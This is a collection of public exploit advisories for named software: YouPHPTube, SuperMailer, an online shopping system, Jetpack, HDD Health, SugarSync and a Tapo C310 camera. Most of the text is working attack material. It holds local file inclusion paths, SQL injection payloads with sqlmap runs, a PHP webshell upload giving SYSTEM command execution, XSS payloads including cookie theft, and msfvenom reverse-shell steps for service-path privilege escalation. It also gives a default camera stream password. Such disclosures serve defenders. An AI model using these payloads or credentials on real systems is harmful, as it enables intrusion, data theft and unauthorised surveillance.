# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-01-31 # Vendor Homepage: https://www.youphptube.com/ # Software Link : https://www.youphptube.com/ # Tested Version: 7.8 # Tested on: Windows 7, 10 using XAMPP # Vulnerability Type: LFI + Path Traversal CVSS v3: 7.5 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-829, CWE-22 Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an include_once in locale/function.php page. Proof of concept: To detect: http://localhost/youphptube/index.php?lang=) An error is generated: Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0 in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47 In function.php page, we can see: // filter some security here if (!empty($_GET['lang'])) { $_GET['lang'] = str_replace(array("'", '"', """, "&#039;"), array('', '', '', ''), xss_esc($_GET['lang'])); } if (empty($_SESSION['language'])) { $_SESSION['language'] = $config->getLanguage(); } if (!empty($_GET['lang'])) { $_GET['lang'] = strip_tags($_GET['lang']); $_SESSION['language'] = $_GET['lang']; } @include_once "{$global['systemRootPath']}locale/{$_SESSION['language']}.php"; The parameter "lang" can be modified and load a php file in the server. In Document root: /phpinfo.php with this content: <?php echo phpinfo(); ?> To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo Note: phpinfo without ".php". The new Path is: @include_once "{$global['systemRootPath']}locale/../../phpinfo.php"; And you can see the PHP information into the browser. # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri parameter. Proof of concept: http://localhost/ <YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>

# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS # Exploit Author: Rafael Pedrero # Discovery Date: 2021-02-07 # Vendor Homepage: https://int.supermailer.de/download_newsletter_software.htm # Software Link : https://int.supermailer.de/smintsw.zip / https://int.supermailer.de/smintsw_x64.zip # Tested Version: v11.20 32bit/64bit [11.20.0.2204] # Tested on: Windows 7, 10 CVSS v3: 3.3 CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L CWE: CWE-20 Vulnerability description: A vulnerability in Newsletter Software SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to cause a process crash resulting in a Denial of service (DoS) condition for the application on an affected system. The vulnerability exists due to insufficient validation of certain elements with a configuration file malformed. An attacker could exploit this vulnerability by sending a user a malicious SMB (configuration file) file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to cause the application to crash when trying to load the malicious file. Proof of concept: 1.- Go to File -> Save program options... 2.- Save the file (default extension *.smb) 3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb file Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@.......... 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f. 000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i. 00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e. 00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a. 00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r. 00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T. 00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i. 00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s. 00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s........... And save the file. 4.- Go to File -> Restore program options... 5.- The application "sm.exe" crash.

# Exploit Title: Online shopping system advanced 1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2020-09-24 # Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced # Software Link : https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip # Tested Version: 1.0 # Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache + php 5.X/7.X + MySQL # Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7 vulnerabilities # Vulnerability Type: SQL Injection - #1 CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-89 Vulnerability description: Online shopping system advanced 1.0 allows SQL injection via the admin/edit_user.php, user_id parameter. Proof of concept: Save this content in a file: POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------120411781422335 Content-Length: 489 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------120411781422335 Content-Disposition: form-data; name="user_id" 25 -----------------------------120411781422335 Content-Disposition: form-data; name="email" otheruser@gmail.com -----------------------------120411781422335 Content-Disposition: form-data; name="password" puneeth@123 -----------------------------120411781422335 Content-Disposition: form-data; name="btn_save" -----------------------------120411781422335-- And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id (custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 115 HTTP(s) requests: --- Parameter: MULTIPART user_id ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: -----------------------------120411781422335 Content-Disposition: form-data; name="user_id" 25' AND SLEEP(5) AND 'HGWF'='HGWF -----------------------------120411781422335 Content-Disposition: form-data; name="email" otheruser@gmail.com -----------------------------120411781422335 Content-Disposition: form-data; name="password" puneeth@123 -----------------------------120411781422335 Content-Disposition: form-data; name="btn_save" -----------------------------120411781422335-- --- [16:25:28] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.38, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 # Vulnerability Type: SQL Injection - #2 CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-89 Vulnerability description: Online shopping system advanced 1.0 allows SQL injection via the action.php, proId parameter. Proof of concept: Save this content in a file: POST http://127.0.0.1/online/action.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/ Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Host: 127.0.0.1 addToCart=1&proId=70 And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId POST parameter 'proId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests: --- Parameter: proId (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv --- [16:03:38] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.38, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 # Vulnerability Type: Remote Command Execution (RCE) CVSS v3: 9.8 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-434 Vulnerability description: File Restriction Bypass vulnerabilities were found in Online shopping system advanced v1.0. This allows for an authenticated user to potentially obtain RCE via webshell. Proof of concept: 1. Go the add product >> (admin/add_product.php) 2.- Select product image and load a valid image. 3. Turn Burp/ZAP Intercept On 4. Select webshell - ex: shell.php 5. Alter request in the upload... Update 'filename' to desired extension. ex: shell.php Not neccesary change content type to 'image/png' Example exploitation request: ==================================================================================================== POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------184982084830387 Content-Length: 960 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/add_product.php Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------184982084830387 Content-Disposition: form-data; name="product_name" demo2 -----------------------------184982084830387 Content-Disposition: form-data; name="details" demo2 -----------------------------184982084830387 Content-Disposition: form-data; name="picture"; filename="shell.php" Content-Type: image/gif <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> -----------------------------184982084830387 Content-Disposition: form-data; name="price" 1 -----------------------------184982084830387 Content-Disposition: form-data; name="product_type" 1 -----------------------------184982084830387 Content-Disposition: form-data; name="brand" 1 -----------------------------184982084830387 Content-Disposition: form-data; name="tags" Summet -----------------------------184982084830387 Content-Disposition: form-data; name="submit" -----------------------------184982084830387-- ==================================================================================================== 6. To view the webshell path go to Product List (admin/cosmetics_list.php) 7. Send the request and visit your new webshell Ex: http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami nt authority\system # Vulnerability Type: stored Cross-Site Scripting (XSS) - #1 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in multiple parameter. Proof of concept: Stored: POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------120411781422335 Content-Length: 496 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------120411781422335 Content-Disposition: form-data; name="user_id" 25 -----------------------------120411781422335 Content-Disposition: form-data; name="email" otheruser@gmail.com -----------------------------120411781422335 Content-Disposition: form-data; name="password" </td><script>alert(1);</script><td> -----------------------------120411781422335 Content-Disposition: form-data; name="btn_save" -----------------------------120411781422335-- # Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in multiple parameter. Proof of concept: Stored: POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 192 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/add_user.php Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save= # Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1 CVSS v3: 6.1 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in page parameter. Proof of concept: Reflected: http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E # Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2 CVSS v3: 6.1 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php, in page parameter. Proof of concept: Reflected: http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E

# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS) # Date: 2022-10-19 # Author: Behrouz Mansoori # Software Link: https://wordpress.org/plugins/jetpack # Version: 11.4 # Tested on: Mac m1 # CVE: N/A 1. Description: This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>

# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path # Exploit Author: Jorge Manuel Lozano Gómez # Date: 2022-10-19 # Vendor Homepage: https://www.panterasoft.com # Software Link: https://hdd-health.softonic.com # Version : 4.2.0.112 # Tested on: Windows 11 64bit # CVE : N/A About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Description: ============================== HDD Health installs a service with an unquoted service path. To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. # PoC =========== 1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The vulnerable service would show up. 3. Check the service permissions by typing [ sc qc "HDDHealth" ] 4. The command would return.. C:\>sc qc "HDDHealth" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HDDHealth TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\HDD Health\HDDHealthService.exe LOAD_ORDER_GROUP : TAG : 0 ISPLAY_NAME : HDDHealth DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. 6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe. 7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory. 8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory. 9. Start a listener. 9. Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ] 9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically. 10. Got shell. During my testing : Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path # Exploit Author: Jorge Manuel Lozano Gómez # Date: 2022-10-20 # Vendor Homepage: https://www1.sugarsync.com # Software Link: https://www1.sugarsync.com/apps/windows/ # Version : 4.1.3 # Tested on: Windows 11 64bit # CVE : N/A About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Description: ============================== SugarSync installs a service with an unquoted service path. To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. # PoC =========== 1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The vulnerable service would show up. 3. Check the service permissions by typing [ sc qc "SugarSync Service" ] 4. The command would return.. C:\>sc qc "SugarSync Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SugarSync Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe LOAD_ORDER_GROUP : TAG : 0 ISPLAY_NAME : SugarSync Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. 6. Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe. 7. Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory. 8. Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory. 9. Start a listener. 9. Now restart the SugarSync service by giving coommand [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ] 9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically. 10. Got shell. During my testing : Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access # Date: 19th July 2022 # Exploit Author: dsclee1 # Vendor Homepage: tp-link.com # Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin # Version: 1.3.0 # Tested on: Linux – running on camera # CVE : CVE-2022-37255 These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera. You can gain unauthorised access to the RTSP stream using the following user details: User: --- Password: TPL075526460603